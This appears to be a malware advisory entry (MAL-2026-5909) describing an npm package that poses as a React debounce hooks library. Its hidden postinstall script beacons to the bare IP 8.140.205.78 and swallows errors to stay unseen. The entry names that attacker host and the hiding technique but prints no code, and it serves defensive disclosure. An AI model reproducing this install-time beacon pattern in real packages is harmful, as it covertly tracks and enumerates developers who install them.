MAL-2026-5909

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (f7491b25e457c908dae1b32fe800f461843e4463807c8590044e4b7cc769843a) package.json declares a postinstall script that issues an HTTPS-module HTTP GET to the bare IP 8.140.205.78:80 on every `npm install`. The request is wrapped in try/catch and an `.on('error',...)` handler that swallows failures, hiding the beacon from operator output. The package advertises itself as a React debounce/throttle hooks library — functionality that requires no install-time network I/O. The beacon discloses each installer's public IP address, install timestamp, and Node.js version (via the default User-Agent) to a host with no relationship to the stated purpose. The package also exhibits typosquat-shape naming (a `-12` numeric suffix on a generic React hook utility name) with placeholder author metadata (`dev-utils <dev@utils-lib.dev>`, GitHub path that does not correspond to a known publisher), consistent with victim-enumeration / install-tracking infrastructure.